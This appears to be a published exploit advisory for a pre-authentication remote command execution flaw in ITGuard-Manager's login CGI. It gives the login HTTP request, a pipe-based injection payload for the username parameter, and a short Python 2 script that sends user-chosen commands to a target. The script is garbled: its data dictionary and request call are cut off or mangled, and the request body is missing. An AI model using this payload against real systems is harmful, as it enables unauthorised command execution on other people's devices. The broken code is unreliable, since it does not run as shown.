ITGuard-Manager Remote Command Execution

ITGuard-Manager version suffers from a pre-authentication remote command execution vulnerability.

MD5 | 48d3d8f91cfef30e61484bc35145eee4

# Vulnerability Title:  ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution 

# Author: Nassim Asrir

# Contact: [email protected] / @asrir_nassim

# CVE: Waiting ...


# Vendor:


First we need to know what happens when we need to LogIn.

When the User or Attacker insert any strings in the login form he/she will get this POST request:

POST /cgi-bin/drknow.cgi?req=login HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://server/log-in.html?lang=KOR
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Connection: close
Upgrade-Insecure-Requests: 1


Ok now we have this POST request and all we care about is the username parameter . and we

can execute our system commands via this parameter due to missing input sanitization.

The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls id mkdir .)


#i am not responsible for any wrong use.

import requests

target = raw_input('Target(With proto) : ')

command = raw_input('Command To Execute : ')

fullpath=target +"/cgi-bin/drknow.cgi?req=login"
data = {'req':'login',

execute =, data = data)

print execute.text

Related Posts